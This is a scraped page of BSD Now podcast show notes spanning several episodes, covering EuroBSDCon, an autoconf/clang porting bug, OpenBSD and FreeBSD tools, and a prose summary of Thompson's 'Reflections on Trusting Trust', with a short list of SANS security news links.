a previous student and every slide containing a reference back to the relevant page(s) in the 2nd edition of Kirk's operating system book. As well as a hard copy for those that requested it, Kirk also helpfully supplied soft copies of all the training materials. The breaks in between lectures were useful for meeting the students from the other tutorials and for recovering from the inevitable information overload. It's not often that you can get to hear someone as renowned as Dr McKusick give a lecture on something as important as the FreeBSD operating system. If you have any interest in FreeBSD, Unix history, or operating systems in general, I would urge you to grab the opportunity to attend one of his lectures. You won't be disappointed. The last two days of the conference consisted of various hour-long talks by members of each of the main BSD systems. All of them were fairly evenly represented except Dragonfly BSD which unfortunately only had one talk. With three talks going on at any one time, it was often difficult to pick which one to go to. At other times there might be nothing to pique the interest. Attendance at a talk is not mandatory, so for those times when no talks looked inviting, just hanging out in one of the lobby areas with other attendees was often just as interesting and informative. The conference centre itself was certainly memorable with the interior design of an Egyptian temple or pyramid. All the classrooms were more than adequate while the main auditorium was first-class and easily held the 300+ attendees comfortably. All in all, the facilities, catering and organisation were excellent. Kudos to the EuroBSDCon team, especially Bapt and Antoine for all their hard work and hospitality. As a long-time watcher and occasional contributor to the BSD Now podcast it was good to meet both Allan and Benedict in the flesh. And having done some proofreading for Michael Lucas previously, it was nice to finally meet him as well. My one suggestion to the organisers of the next conference would be to provide more hand-holding for newbies. As a first-time attendee at a BSD conference it would have been nice to have been formally introduced to various people within the projects as the goto people for their areas. I could do this myself, but it's not always easy finding the right person and wrangling an introduction. I also think it was a missed opportunity for each project to recruit new developers to their cause. Apparently, this is already in place at BSDCan, but should probably be rolled out across all BSD conferences. Having said all that, my aims for the conference were to take Dr McKusick's course, meet a few BSD people and make contacts within one of the BSD projects to start contributing. I was successful on all these fronts, so for me this was mission accomplished. Another first! autoconf/clang (No) Fun and Games (https://undeadly.org/cgi?action=article;sid=20170930133438) Robert Nagy (robert@) wrote in with a fascinating story of hunting down a recent problem with ports: You might have been noticing the amount of commits to ports regarding autoconf and nested functions and asking yourself… what the hell is this all about? I was hanging out at my friend Antoine (ajacoutot@)'s place just before EuroBSDCon 2017 started and we were having drinks and he told me that there is this weird bug where Gnome hangs completely after just a couple of seconds of usage and the gnome-shell process just sits in the fsleep state. This started to happen at the time when inteldrm(4) was updated, the default compiler was switched to clang(1) and futexes were turned on by default. The next day we started to have a look at the issue and since the process was hanging in fsleep, it seemed clear that the cause must be futexes, so we had to start bisecting the base system, which resulted in random success and failure. In the end we figured out that it is neither futex nor inteldrm(4) related, so the only thing that was left is the switch to clang. Now the problem is that we have to figure out what part of the system needs to be build with clang to trigger this issue, so we kept on going and systematically recompiled the base system with gcc until everything was ruled out … and it kept on hanging. We were drunk and angry that now we have to go and check hundreds of ports because gnome is not a small standalone port, so between two bottles of wine a build VM was fired up to do a package build with gcc, because manually building all the dependencies would just take too long and we had spent almost two days on this already. Next day ~200 packages were available to bisect and figure out what's going on. After a couple of tries it turned out that the hang is being caused by the gtk+3 package, which is bad since almost everything is using gtk+3. Now it was time to figure out what file the gtk+3 source being built by clang is causing the issue. (Compiler optimizations were ruled out already at this point.) So another set of bisecting happened, building each subdirectory of gtk+3 with clang and waiting for the hang to manifest … and it did not. What the $f? Okay so something else is going on and maybe the configure script of gtk+3 is doing something weird with different compilers, so I quickly did two configure runs with gcc and clang and simply diff'd the two directories. Snippets from the diff: -GDKHIDDENVISIBILITYCFLAGS = -fvisibility=hidden GDKHIDDENVISIBILITYCFLAGS = -ltcvprogcompilerrttiexceptions=no ltcvprogcompilerrttiexceptions=yes -#define GDKEXTERN attribute((visibility("default"))) extern -ltprogcompilernobuiltinflag=' -fno-builtin' +ltprogcompilernobuiltinflag=' -fno-builtin -fno-rtti -fno-exceptions' Okay, okay that's something, but wait … clang has symbol visibility support so what is going on again? Let's take a peek at config.log: configure:29137: checking for -fvisibility=hidden compiler flag configure:29150: cc -c -fvisibility=hidden -I/usr/local/include -I/usr/X11R6/include conftest.c >&5 conftest.c:82:17: error: function definition is not allowed here int main (void) { return 0; } ^ 1 error generated. Okay that's clearly an error but why exactly? autoconf basically generates a huge shell script that will check for whatever you throw at it by creating a file called conftest.c and putting chunks of code into it and then trying to compile it. In this case the relevant part of the code was: | int | main () | { | int main (void) { return 0; } | ; | return 0; | } That is a nested function declaration which is a GNU extension and it is not supported by clang, but that's okay, the question is why the hell would you use nested functions to check for simple compiler flags. The next step was to go and check what is going on in configure.ac to see how the configure script is generated. In the gtk+3 case the following snippet is used: AC_MSG_CHECKING([for -fvisibility=hidden compiler flag]) ACTRYCOMPILE([], [int main (void) { return 0; }], ACMSGRESULT(yes) enablefvisibilityhidden=yes, ACMSGRESULT(no) enablefvisibilityhidden=no) According to the autoconf manual the ACTRYCOMPILE macro accepts the following parameters: That clearly states that a function body has to be specified because the function definition is already provided automatically, so doing ACTRYCOMPILE([], [int main (void) { return 0;}], instead of ACTRYCOMPILE([],[] will result in a nested function declaration, which will work just fine with gcc, even though the autoconf usage is wrong. After fixing the autoconf macro in gtk+3 and rebuilding the complete port from scratch with clang, the hang completely went away as the proper CFLAGS and LDFLAGS were picked up by autoconf for the build. At this point we realized that most of the ports tree uses autoconf so this issue might be a lot bigger than we thought, so I asked sthen@ to do a grep on the ports object directory and just search for "function definition is not allowed here", which resulted in about ~60 additional ports affected. Out of the list of ports there were only two false positive matches. These were actually trying to test whether the compiler supports nested functions. The rest were a combination of several autoconf macros used in a wrong way, e.g: ACTRYCOMPILE, ACTRYLINK. Most of them were fixable by just removing the extra function declaration or by switching to other autoconf macros like ACLANGSOURCE where you can actually declare your own functions if need be. The conclusion is that this issue was a combination of people not reading documentation and just copy/pasting autoconf snippets, instead of reading their documentation and using the macros in the way they were intended, and the fact that switching to a new compiler is never easy and bugs or undefined behaviour are always lurking in the dark. Thanks to everyone who helped fixing all the ports up this quickly! Hopefully all of the changes can be merged upstream, so that others can benefit as well. Interview - David Carlier - @devnexen (https://twitter.com/devnexen) Software Engineer at Afilias *** News Roundup Setting up OpenBSD's LDAP Server (ldapd) with StartTLS and SASL (http://blog.databasepatterns.com/2017/08/setting-up-openbsds-ldap-server-ldapd.html) A tutorial on setting up OpenBSD's native LDAP server with TLS encryption and SASL authentication OpenBSD has its own LDAP server, ldapd. Here's how to configure it for use with StartTLS and SASL authentication Create a certificate (acme-client anyone?) Create a basic config file listen on em0 tls certificate ldapserver This will listen on the em0 interface with tls using the certificate called ldapserver.crt / ldapserver.key Validate the configuration: /usr/sbin/ldapd -n Enable and start the service: rcctl enable ldapd rcctl start ldapd On the client machine: pkg_add openldap-client Copy the certificate to /etc/ssl/trusted.crt Add this line to /etc/openldap/ldap.conf TLS_CACERT /etc/ssl/trusted.crt Enable and start the service rcctl enable saslauthd rcctl start saslauthd Connect to ldapd (-ZZ means force TLS, use -H to specify URI): ldapsearch -H ldap://ldapserver -ZZ FreeBSD Picks Up Support for ZFS Channel Programs in -current (https://svnweb.freebsd.org/base?view=revision&revision=324163) ZFS channel programs (ZCP) adds support for performing compound ZFS administrative actions via Lua scripts in a sandboxed environment (with time and memory limits). This initial commit includes both base support for running ZCP scripts, and a small initial library of API calls which support getting properties and listing, destroying, and promoting datasets. Testing: in addition to the included unit tests, channel programs have been in use at Delphix for several months for batch destroying filesystems. Take a simple task as an example: Create a snapshot, then set a property on that snapshot. In the traditional system for this, when you issue the snapshot command, that closes the currently open transaction group (say #100), and opens a new one, #101. While #100 is being written to disk, other writes are accumulated in #101. Once #100 is flushed to disk, the ‘zfs snapshot' command returns. You can then issue the ‘zfs set' command. This actually ends up going into transaction group #102. Each administrative action needs to wait for the transaction group to flush, which under heavy loads could take multiple seconds. Now if you want to create AND set, you need to wait for two or three transaction groups. Meanwhile, during transaction group #101, the snapshot existed without the property set, which could cause all kinds of side effects. ZFS Channel programs solves this by allowing you to perform a small scripted set of actions as a single atomic operation. In Delphix's appliance, they often needed to do as many as 15 operations together, which might take multiple minutes. Now with channel programs it is much faster, far safer, and has fewer chances of side effects BSDCan 2017 - Matt Ahrens: Building products based on OpenZFS, using channel programs -- Video Soon (http://www.bsdcan.org/2017/schedule/events/854.en.html) Software Is About Storytelling (http://bravenewgeek.com/software-is-about-storytelling/) Tyler Treat writes on the brave new geek blog: Software engineering is more a practice in archeology than it is in building. As an industry, we undervalue storytelling and focus too much on artifacts and tools and deliverables. How many times have you been left scratching your head while looking at a piece of code, system, or process? It's the story, the legacy left behind by that artifact, that is just as important—if not more—than the artifact itself. And I don't mean what's in the version control history—that's often useless. I mean the real, human story behind something. Artifacts, whether that's code or tools or something else entirely, are not just snapshots in time. They're the result of a series of decisions, discussions, mistakes, corrections, problems, constraints, and so on. They're the product of the engineering process, but the problem is they usually don't capture that process in its entirety. They rarely capture it at all. They commonly end up being nothing but a snapshot in time. It's often the sign of an inexperienced engineer when someone looks at something and says, “this is stupid” or “why are they using X instead of Y?” They're ignoring the context, the fact that circumstances may have been different. There is a story that led up to that point, a reason for why things are the way they are. If you're lucky, the people involved are still around. Unfortunately, this is not typically the case. And so it's not necessarily the poor engineer's fault for wondering these things. Their predecessors haven't done enough to make that story discoverable and share that context. I worked at a company that built a homegrown container PaaS on ECS. Doing that today would be insane with the plethora of container solutions available now. “Why aren't you using Kubernetes?” Well, four years ago when we started, Kubernetes didn't exist. Even Docker was just in its infancy. And it's not exactly a flick of a switch to move multiple production environments to a new container runtime, not to mention the politicking with leadership to convince them it's worth it to not ship any new code for the next quarter as we rearchitect our entire platform. Oh, and now the people behind the original solution are no longer with the company. Good luck! And this is on the timescale of about five years. That's maybe like one generation of engineers at the company at most—nothing compared to the decades or more software usually lives (an interesting observation is that timescale, I think, is proportional to the size of an organization). Don't underestimate momentum, but also don't underestimate changing circumstances, even on a small time horizon. The point is, stop looking at technology in a vacuum. There are many facets to consider. Likewise, decisions are not made in a vacuum. Part of this is just being an empathetic engineer. The corollary to this is you don't need to adopt every bleeding-edge tech that comes out to be successful, but the bigger point is software is about storytelling. The question you should be asking is how does your organization tell those stories? Are you deliberate or is it left to tribal knowledge and hearsay? Is it something you truly value and prioritize or simply a byproduct? Documentation is good, but the trouble with documentation is it's usually haphazard and stagnant. It's also usually documentation of how and not why. Documenting intent can go a long way, and understanding the why is a good way to develop empathy. Code survives us. There's a fantastic talk by Bryan Cantrill on oral tradition in software engineering (https://youtu.be/4PaWFYm0kEw) where he talks about this. People care about intent. Specifically, when you write software, people care what you think. As Bryan puts it, future generations of programmers want to understand your intent so they can abide by it, so we need to tell them what our intent was. We need to broadcast it. Good code comments are an example of this. They give you a narrative of not only what's going on, but why. When we write software, we write it for future generations, and that's the most underestimated thing in all of software. Documenting intent also allows you to document your values, and that allows the people who come after you to continue to uphold them. Storytelling in software is important. Without it, software archeology is simply the study of puzzles created by time and neglect. When an organization doesn't record its history, it's bound to repeat the same mistakes. A company's memory is comprised of its people, but the fact is people churn. Knowing how you got here often helps you with getting to where you want to be. Storytelling is how we transcend generational gaps and the inevitable changing of the old guard to the new guard in a maturing engineering organization. The same is true when we expand that to the entire industry. We're too memoryless—shipping code and not looking back, discovering everything old that is new again, and simply not appreciating our lineage. Beastie Bits 1st BSD Users Stockholm Meetup (https://www.meetup.com/en-US/BSD-Users-Stockholm/) Absolute FreeBSD, 3rd Edition draft completed (https://blather.michaelwlucas.com/archives/3020) Absolute FreeBSD, 3rd Edition Table of Contents (https://blather.michaelwlucas.com/archives/2995) t2k17 Hackathon Report: My first time (Aaron Bieber) (https://undeadly.org/cgi?action=article;sid=20170824193521) The release of pfSense 2.4.0 will be slightly delayed to apply patches for vulnerabilities in 3rd party packages that are part of pfSense (https://www.netgate.com/blog/no-plan-survives-contact-with-the-internet.html) Feedback/Questions Ben writes in that zrepl is in ports now (http://dpaste.com/1XMJYMH#wrap) Peter asks us about Netflix on BSD (http://dpaste.com/334WY4T#wrap) meka writes in about dhclient exiting (http://dpaste.com/3GSGKD3#wrap) ***

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast

LDAP and STARTTLS https://isc.sans.edu/forums/diary/SSLTLS+on+port+389+Say+what/22135/ Wordpress NextGen Gallery Plugin SQL Injection Vulnerability https://blog.sucuri.net/2017/02/sql-injection-vulnerability-nextgen-gallery-wordpress.html Password Manager Insecurities https://team-sik.org/trent_portfolio/password-manager-apps/ Slack Insecure Cross Window Messaging https://labs.detectify.com/2017/02/28/hacking-slack-using-postmessage-and-websocket-reconnect-to-steal-your-precious-token/ Google Voice Recognition Used to Break Google ReCaptcha Audio Challenge https://east-ee.com/2017/02/28/rebreakcaptcha-breaking-googles-recaptcha-v2-using-google/

BSD Now
171: The APU - BSD Style!

BSD Now

Play Episode Listen Later Dec 7, 2016 87:13


Today on the show, we've got a look at running OpenBSD on a APU, some BSD in your Android, managing your own FreeBSD cloud service with ansible and much more. Keep it turned on your place to B...SD! This episode was brought to you by Headlines OpenBSD on PC Engines APU2 (https://github.com/elad/openbsd-apu2) A detailed walkthrough of building an OpenBSD firewall on a PC Engines APU2 It starts with a breakdown of the parts that were purchases, totally around $200 Then the reader is walked through configuring the serial console, flashing the ROM, and updating the BIOS The next step is actually creating a custom OpenBSD install image, and pre-configuring its serial console. Starting with OpenBSD 6.0, this step is done automatically by the installer Installation: Power off the APU2 Insert the bootable OpenBSD installer USB flash drive to one of the USB slots on the APU2 Power on the APU2, press F10 to get to the boot menu, and choose to boot from USB (usually option number 1) At the boot> prompt, remember the serial console settings (see above) Also at the boot> prompt, press Enter to start the installer Follow the installation instructions The driver used for wireless networking is athn(4). It might not work properly out of the box. Once OpenBSD is installed, run fw_update with no arguments. It will figure out which firmware updates are required and will download and install them. When it finishes, reboot. Where the rubber meets the road… (part one) (https://functionallyparanoid.com/2016/11/29/where-the-rubber-meets-the-road-part-one/) A user describes their adventures installing OpenBSD and Arch Linux on a new Lenovo X1 Carbon (4th gen, skylake) They also detail why they moved away from their beloved Macbook, which while long, does describe a journey away from Apple that we've heard elsewhere. The journey begins with getting a new Windows laptop, shrinking the partition and creating space for a triple-boot install, of Windows / Arch / OpenBSD Brian then details how he setup the partitioning and performed the initial Arch installation, getting it tuned to his specifications. Next up was OpenBSD though, and that went sideways initially due to a new NVMe drive that wasn't fully supported (yet) The article is split into two parts (we will bring you the next installment at a future date), but he leaves us with the plan of attack to build a custom OpenBSD kernel with corrected PCI device identifiers. We wish Brian luck, and look forward to the “rest of the story” soon. *** Howto setup a FreeBSD jail server using iocage and ansible. (https://github.com/JoergFiedler/freebsd-ansible-demo) Setting up a FreeBSD jail server can be a daunting task. However when a guide comes along which shows you how to do that, including not exposing a single (non-jailed) port to the outside world, you know we had a take a closer look. This guide comes to us from GitHub, courtesy of Joerg Fielder. The project goals seem notable: Ansible playbook that creates a FreeBSD server which hosts multiple jails. Travis is used to run/test the playbook. No service on the host is exposed externally. All external connections terminate within a jail. Roles can be reused using Ansible Galaxy. Combine any of those roles to create FreeBSD server, which perfectly suits you. To get started, you'll need a machine with Ansible, Vagrant and VirtualBox, and your credentials to AWS if you want it to automatically create / destroy EC2 instances. There's already an impressive list of Anisible roles created for you to start with: freebsd-build-server - Creates a FreeBSD poudriere build server freebsd-jail-host - FreeBSD Jail host freebsd-jailed - Provides a jail freebsd-jailed-nginx - Provides a jailed nginx server freebsd-jailed-php-fpm - Creates a php-fpm pool and a ZFS dataset which is used as web root by php-fpm freebsd-jailed-sftp - Installs a SFTP server freebsd-jailed-sshd - Provides a jailed sshd server. freebsd-jailed-syslogd - Provides a jailed syslogd freebsd-jailed-btsync - Provides a jailed btsync instance server freebsd-jailed-joomla - Installs Joomla freebsd-jailed-mariadb - Provides a jailed MariaDB server freebsd-jailed-wordpress - Provides a jailed Wordpress server. Since the machines have to be customized before starting, he mentions that cloud-init is used to do the following: activate pf firewall add a pass all keep state rule to pf to keep track of connection states, which in turn allows you to reload the pf service without losing the connection install the following packages: sudo bash python27 allow passwordless sudo for user ec2-user “ From there it is pretty straight-forward, just a couple commands to spin up the VM's either locally on your VirtualBox host, or in the cloud with AWS. Internally the VM's are auto-configured with iocage to create jails, where all your actual services run. A neat project, check it out today if you want a shake-n-bake type cloud + jail solution. Colin Percival's bsdiff helps reduce Android apk bandwidth usage by 6 petabytes per day (http://android-developers.blogspot.ca/2016/12/saving-data-reducing-the-size-of-app-updates-by-65-percent.html) A post on the official Android-Developers blog, talks about how they used bsdiff (and bspatch) to reduce the size of Android application updates by 65% bsdiff was developed by FreeBSD's Colin Percival Earlier this year, we announced that we started using the bsdiff algorithm (by Colin Percival). Using bsdiff, we were able to reduce the size of app updates on average by 47% compared to the full APK size. This post is actually about the second generation of the code. Today, we're excited to share a new approach that goes further — File-by-File patching. App Updates using File-by-File patching are, on average, 65% smaller than the full app, and in some cases more than 90% smaller. Android apps are packaged as APKs, which are ZIP files with special conventions. Most of the content within the ZIP files (and APKs) is compressed using a technology called Deflate. Deflate is really good at compressing data but it has a drawback: it makes identifying changes in the original (uncompressed) content really hard. Even a tiny change to the original content (like changing one word in a book) can make the compressed output of deflate look completely different. Describing the differences between the original content is easy, but describing the differences between the compressed content is so hard that it leads to inefficient patches. So in the second generation of the code, they use bsdiff on each individual file, then package that, rather than diffing the original and new archives bsdiff is used in a great many other places, including shrinking the updates for the Firefox and Chrome browsers You can find out more about bsdiff here: http://www.daemonology.net/bsdiff/ A far more sophisticated algorithm, which typically provides roughly 20% smaller patches, is described in my doctoral thesis (http://www.daemonology.net/papers/thesis.pdf). Considering the gains, it is interesting that no one has implemented Colin's more sophisticated algorithm Colin had an interesting observation (https://twitter.com/cperciva/status/806426180379230208) last night: “I just realized that bandwidth savings due to bsdiff are now roughly equal to what the total internet traffic was when I wrote it in 2003.” *** News Roundup Distrowatch does an in-depth review of NAS4Free (https://distrowatch.com/weekly.php?issue=20161114#nas4free) Jesse Smith over at DistroWatch has done a pretty in-depth review of Nas4Free. The review starts with mentioning that NAS4Free works on 3 platforms, ARM/i386/AMD64 and for the purposes of this review he would be using AMD64 builds. After going through the initial install (doing typical disk management operations, such as GPT/MBR, etc) he was ready to begin using the product. One concern originally observed was that the initial boot seemed rather slow. Investigation revealed this was due to it loading the entire OS image into memory, and the first (long) disk read did take some time, but once loaded was super responsive. The next steps involved doing the initial configuration, which meant creating a new ZFS storage pool. After this process was done, he did find one puzzling UI option called “VM” which indicated it can be linked to VirtualBox in some way, but the Docs didn't reveal its secrets of usage. Additionally covered were some of the various “Access” methods, including traditional UNIX permissions, AD and LDAP, and then various Sharing services which are typical to a NAS, Such as NFS / Samba and others. One neat feature was the built-in file-browser via the web-interface, which allows you another method of getting at your data when sometimes NFS / Samba or WebDav aren't enough. Jesse gives us a nice round-up conclusion as well Most of the NAS operating systems I have used in the past were built around useful features. Some focused on making storage easy to set up and manage, others focused on services, such as making files available over multiple protocols or managing torrents. Some strive to be very easy to set up. NAS4Free does pretty well in each of the above categories. It may not be the easiest platform to set up, but it's probably a close second. It may not have the prettiest interface for managing settings, but it is quite easy to navigate. NAS4Free may not have the most add-on services and access protocols, but I suspect there are more than enough of both for most people. Where NAS4Free does better than most other solutions I have looked at is security. I don't think the project's website or documentation particularly focuses on security as a feature, but there are plenty of little security features that I liked. NAS4Free makes it very easy to lock the text console, which is good because we do not all keep our NAS boxes behind locked doors. The system is fairly easy to upgrade and appears to publish regular security updates in the form of new firmware. NAS4Free makes it fairly easy to set up user accounts, handle permissions and manage home directories. It's also pretty straight forward to switch from HTTP to HTTPS and to block people not on the local network from accessing the NAS's web interface. All in all, I like NAS4Free. It's a good, general purpose NAS operating system. While I did not feel the project did anything really amazing in any one category, nor did I run into any serious issues. The NAS ran as expected, was fairly straight forward to set up and easy to manage. This strikes me as an especially good platform for home or small business users who want an easy set up, some basic security and a solid collection of features. Browsix: Unix in the browser tab (https://browsix.org/) Browsix is a research project from the PLASMA lab at the University of Massachusetts, Amherst. The goal: Run C, C++, Go and Node.js programs as processes in browsers, including LaTeX, GNU Make, Go HTTP servers, and POSIX shell scripts. “Processes are built on top of Web Workers, letting applications run in parallel and spawn subprocesses. System calls include fork, spawn, exec, and wait.” Pipes are supported with pipe(2) enabling developers to compose processes into pipelines. Sockets include support for TCP socket servers and clients, making it possible to run applications like databases and HTTP servers together with their clients in the browser. Browsix comprises two core parts: A kernel written in TypeScript that makes core Unix features (including pipes, concurrent processes, signals, sockets, and a shared file system) available to web applications. Extended JavaScript runtimes for C, C++, Go, and Node.js that support running programs written in these languages as processes in the browser. This seems like an interesting project, although I am not sure how it would be used as more than a toy *** Book Review: PAM Mastery (https://www.cyberciti.biz/reviews/book-review-pam-mastery/) nixCraft does a book review of Michael W. Lucas' “Pam Mastery” Linux, FreeBSD, and Unix-like systems are multi-user and need some way of authenticating individual users. Back in the old days, this was done in different ways. You need to change each Unix application to use different authentication scheme. Before PAM, if you wanted to use an SQL database to authenticate users, you had to write specific support for that into each of your applications. Same for LDAP, etc. So Open Group lead to the development of PAM for the Unix-like system. Today Linux, FreeBSD, MacOS X and many other Unix-like systems are configured to use a centralized authentication mechanism called Pluggable Authentication Modules (PAM). The book “PAM Mastery” deals with the black magic of PAM. Of course, each OS chose to implement PAM a little bit differently The book starts with the basic concepts about PAM and authentication. You learn about Multi-Factor Authentication and why use PAM instead of changing each program to authenticate the user. The author went into great details about why PAM is useful for developers and sysadmin for several reasons. The examples cover CentOS Linux (RHEL and clones), Debian Linux, and FreeBSD Unix system. I like the way the author described PAM Configuration Files and Common Modules that covers everyday scenarios for the sysadmin. PAM configuration file format and PAM Module Interfaces are discussed in easy to understand language. Control flags in PAM can be very confusing for new sysadmins. Modules can be stacked in a particular order, and the control flags determine how important the success or failure of a particular module. There is also a chapter about using one-time passwords (Google Authenticator) for your application. The final chapter is all about enforcing good password policies for users and apps using PAM. The sysadmin would find this book useful as it covers a common authentication scheme that can be used with a wide variety of applications on Unix. You will master PAM topics and take control over authentication for your organization IT infrastructure. If you are Linux or Unix sysadmin, I would highly recommend this book. Once again Michael W Lucas nailed it. The only book you may need for PAM deployment. get “PAM Mastery” (https://www.michaelwlucas.com/tools/pam) *** Reflections on Trusting Trust - Ken Thompson, co-author of UNIX (http://www.win.tue.nl/~aeb/linux/hh/thompson/trust.html) Ken Thompson's "cc hack" - Presented in the journal, Communication of the ACM, Vol. 27, No. 8, August 1984, in a paper entitled "Reflections on Trusting Trust", Ken Thompson, co-author of UNIX, recounted a story of how he created a version of the C compiler that, when presented with the source code for the "login" program, would automatically compile in a backdoor to allow him entry to the system. This is only half the story, though. In order to hide this trojan horse, Ken also added to this version of "cc" the ability to recognize if it was recompiling itself to make sure that the newly compiled C compiler contained both the "login" backdoor, and the code to insert both trojans into a newly compiled C compiler. In this way, the source code for the C compiler would never show that these trojans existed. The article starts off by talking about a content to write a program that produces its own source code as output. Or rather, a C program, that writes a C program, that produces its own source code as output. The C compiler is written in C. What I am about to describe is one of many "chicken and egg" problems that arise when compilers are written in their own language. In this case, I will use a specific example from the C compiler. Suppose we wish to alter the C compiler to include the sequence "v" to represent the vertical tab character. The extension to Figure 2 is obvious and is presented in Figure 3. We then recompile the C compiler, but we get a diagnostic. Obviously, since the binary version of the compiler does not know about "v," the source is not legal C. We must "train" the compiler. After it "knows" what "v" means, then our new change will become legal C. We look up on an ASCII chart that a vertical tab is decimal 11. We alter our source to look like Figure 4. Now the old compiler accepts the new source. We install the resulting binary as the new official C compiler and now we can write the portable version the way we had it in Figure 3. The actual bug I planted in the compiler would match code in the UNIX "login" command. The replacement code would miscompile the login command so that it would accept either the intended encrypted password or a particular known password. Thus if this code were installed in binary and the binary were used to compile the login command, I could log into that system as any user. Such blatant code would not go undetected for long. Even the most casual perusal of the source of the C compiler would raise suspicions. Next “simply add a second Trojan horse to the one that already exists. The second pattern is aimed at the C compiler. The replacement code is a Stage I self-reproducing program that inserts both Trojan horses into the compiler. This requires a learning phase as in the Stage II example. First we compile the modified source with the normal C compiler to produce a bugged binary. We install this binary as the official C. We can now remove the bugs from the source of the compiler and the new binary will reinsert the bugs whenever it is compiled. Of course, the login command will remain bugged with no trace in source anywhere. So now there is a trojan'd version of cc. If you compile a clean version of cc, using the bad cc, you will get a bad cc. If you use the bad cc to compile the login program, it will have a backdoor. The source code for both backdoors no longer exists on the system. You can audit the source code of cc and login all you want, they are trustworthy. The compiler you use to compile your new compiler, is the untrustworthy bit, but you have no way to know it is untrustworthy, and no way to make a new compiler, without using the bad compiler. The moral is obvious. You can't trust code that you did not totally create yourself. (Especially code from companies that employ people like me.) No amount of source-level verification or scrutiny will protect you from using untrusted code. In demonstrating the possibility of this kind of attack, I picked on the C compiler. I could have picked on any program-handling program such as an assembler, a loader, or even hardware microcode. As the level of program gets lower, these bugs will be harder and harder to detect. A well installed microcode bug will be almost impossible to detect. Acknowledgment: I first read of the possibility of such a Trojan horse in an Air Force critique of the security of an early implementation of Multics. I can- not find a more specific reference to this document. I would appreciate it if anyone who can supply this reference would let me know. Beastie Bits Custom made Beastie Stockings (https://www.etsy.com/listing/496638945/freebsd-beastie-christmas-stocking) Migrating ZFS from mirrored pool to raidz1 pool (http://ximalas.info/2016/12/06/migrating-zfs-from-mirrored-pool-to-raidz1-pool/) OpenBSD and you (https://home.nuug.no/~peter/blug2016/) Watson.org FreeBSD and Linux cross reference (http://fxr.watson.org/) OpenGrok (http://bxr.su/) FreeBSD SA-16:37: libc (https://www.freebsd.org/security/advisories/FreeBSD-SA-16:37.libc.asc) -- A 26+ year old bug found in BSD's libc, all BSDs likely affected -- A specially crafted argument can trigger a static buffer overflow in the library, with possibility to rewrite following static buffers that belong to other library functions. HardenedBSD issues correction for libc patch (https://github.com/HardenedBSD/hardenedBSD/commit/fb823297fbced336b6beeeb624e2dc65b67aa0eb) -- original patch improperly calculates how many bytes are remaining in the buffer. From December the 27th until the 30th there the 33rd Chaos Communication Congress[0] is going to take place in Hamburg, Germany. Think of it as the yearly gathering of the european hackerscene and their overseas friends. I am one of the persons organizing the "BSD assembly (https://events.ccc.de/congress/2016/wiki/Assembly:BSD)" as a gathering place for BSD enthusiasts and waving the flag amidst the all the other projects / communities. Feedback/Questions Chris - IPFW + Wifi (http://pastebin.com/WRiuW6nn) Jason - bhyve pci (http://pastebin.com/JgerqZZP) Al - pf errors (http://pastebin.com/3XY5MVca) Zach - Xorg settings (http://pastebin.com/Kty0qYXM) Bart - Wireless Support (http://pastebin.com/m3D81GBW) ***

BSD Now
99: BSD Gnow

BSD Now

Play Episode Listen Later Jul 22, 2015 79:15


This week we'll be talking with Ryan Lortie and Baptiste Daroussin about GNOME on BSD. Upstream development is finally treating the BSDs as a first class citizen, so we'll hear about how the recent porting efforts have been since. This episode was brought to you by Headlines OpenBSD presents tame (https://www.marc.info/?l=openbsd-tech&m=143725996614627&w=2) Theo de Raadt sent out an email detailing OpenBSD's new "tame" subsystem, written by Nicholas Marriott and himself, for restricting what processes can and can't do When using tame, programs will switch to a "restricted-service operating mode," limiting them to only the things they actually need to do As for the background: "Generally there are two models of operation. The first model requires a major rewrite of application software for effective use (ie. capsicum). The other model in common use lacks granularity, and allows or denies an operation throughout the entire lifetime of a process. As a result, they lack differentiation between program 'initialization' versus 'main servicing loop.' systrace had the same problem. My observation is that programs need a large variety of calls during initialization, but few in their main loops." Some initial categories of operation include: computation, memory management, read-write operations on file descriptors, opening of files and, of course, networking Restrictions can also be stacked further into the lifespan of the process, but removed abilities can never be regained (obviously) Anything that tries to access resources outside of its in-place limits gets terminated with a SIGKILL or, optionally, a SIGABRT (which can produce useful core dumps for investigation) Also included are 29 examples of userland programs that get additional protection with very minimal changes to the source - only 2 or 3 lines needing changed in the case of binaries like cat, ps, dmesg, etc. This is an initial work-in-progress version of tame, so there may be more improvements or further (https://www.marc.info/?l=openbsd-tech&m=143740834710502&w=2) control (https://www.marc.info/?l=openbsd-tech&m=143741052411159&w=2) options added before it hits a release (very specific access policies can sometimes backfire (https://forums.grsecurity.net/viewtopic.php?f=7&t=2522), however) The man page, also included in the mail, provides some specifics about how to integrate tame properly into your code (which, by design, was made very easy to do - making it simple means third party programs are more likely to actually use it) Kernel bits are in the tree now (https://www.marc.info/?l=openbsd-cvs&m=143727335416513&w=2), with userland changes starting to trickle in too Combined with a myriad of memory protections (http://www.bsdnow.tv/episodes/2015_05_13-exclusive_disjunction), tight privilege separation and (above all else (https://en.wikipedia.org/wiki/OpenBSD_security_features)) good coding practices, tame should further harden the OpenBSD security fortress Further discussion (https://news.ycombinator.com/item?id=9928221) can (https://www.reddit.com/r/programming/comments/3dsr0t) be (http://undeadly.org/cgi?action=article&sid=20150719000800&mode=flat) found (https://news.ycombinator.com/item?id=9909429) in (https://www.reddit.com/r/linux/comments/3ds66o) the (https://lobste.rs/s/tbbtfs) usual (https://www.reddit.com/r/openbsd/comments/3ds64c) places (https://www.reddit.com/r/BSD/comments/3ds681) you'd expect *** Using Docker on FreeBSD (https://wiki.freebsd.org/Docker) With the experimental Docker port landing in FreeBSD a few weeks ago, some initial docs are starting to show up This docker is "the real thing," and isn't using a virtual machine as the backend - as such, it has some limitations The FreeBSD wiki has a page detailing how it works in general, as well as more info about those limitations When running Linux containers, it will only work as well as the Linux ABI compat layer for your version of FreeBSD (11.0, or -CURRENT when we're recording this, is where all the action is for 64bit support) For users on 10.X, there's also a FreeBSD container available, which allows you to use Docker as a fancy jail manager (it uses the jail subsystem internally) Give it a try, let us know how you find it to be compared to other solutions *** OpenBSD imports doas, removes sudo (http://www.tedunangst.com/flak/post/doas) OpenBSD has included the ubiquitous "sudo" utility for many years now, and the current maintainer of sudo (Todd C. Miller) is also a long-time OpenBSD dev The version included in the base system was much smaller than the latest current version used elsewhere, but was based on older code Some internal discussion lead to the decision that sudo should probably be moved to ports now, where it can be updated easily and offer all the extra features that were missing in base (LDAP and whatnot) Ted Unangst conjured up with a rewritten utility to replace it in the base system, dubbed "do as," with the aim of being more simple and compact There were concerns that sudo was too big and too complicated, and a quick 'n' 